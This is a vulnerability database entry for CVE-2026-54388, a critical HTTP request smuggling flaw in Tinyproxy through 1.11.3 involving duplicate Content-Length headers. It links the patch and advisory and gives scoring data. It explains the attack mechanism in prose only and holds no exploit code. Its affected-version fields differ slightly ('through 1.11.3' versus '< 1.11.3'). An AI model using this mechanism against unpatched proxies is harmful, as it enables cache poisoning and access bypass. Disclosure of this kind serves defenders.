CVE-2026-54388
CRITICALTinyproxy - HTTP Request Smuggling via Duplicate Content-Length Headers
Title source: cnaDescription
Tinyproxy through 1.11.3, fixed in commit 364cdb6, fails to reject requests containing multiple Content-Length headers with differing values, forwarding all duplicate headers to the backend while using the first value to determine how many request body bytes to consume. Remote attackers can desynchronize the proxy and backend parser state, allowing injection of arbitrary HTTP requests to the backend to enable cache poisoning, access control bypass, and request hijacking.
References (4)
Core 4
Core References
Technical Description technical-description
Researcher Pull Request
https://github.com/tinyproxy/tinyproxy/issues/609
Issue Tracking issue-tracking
Maintainer Pull Request
https://github.com/tinyproxy/tinyproxy/pull/610
Patch patch
Patch Commit
https://github.com/tinyproxy/tinyproxy/commit/364cdb67e0ea00a8e4a7037e2693e0711e816adb
Third Party Advisory third-party-advisory
https://www.vulncheck.com/advisories/tinyproxy-http-request-smuggling-via-duplicate-content-length-headers
Scores
CVSS v3
9.1
EPSS
0.0039
EPSS Percentile
30.1%
Attack Vector
NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
CISA SSVC
Vulnrichment
Exploitation
poc
Automatable
yes
Technical Impact
total
Details
CWE
CWE-444
Status
published
Products (2)
tinyproxy/tinyproxy
< 1.11.3
tinyproxy/tinyproxy
364cdb67e0ea00a8e4a7037e2693e0711e816adb
Published
Jun 17, 2026
Tracked Since
Jun 18, 2026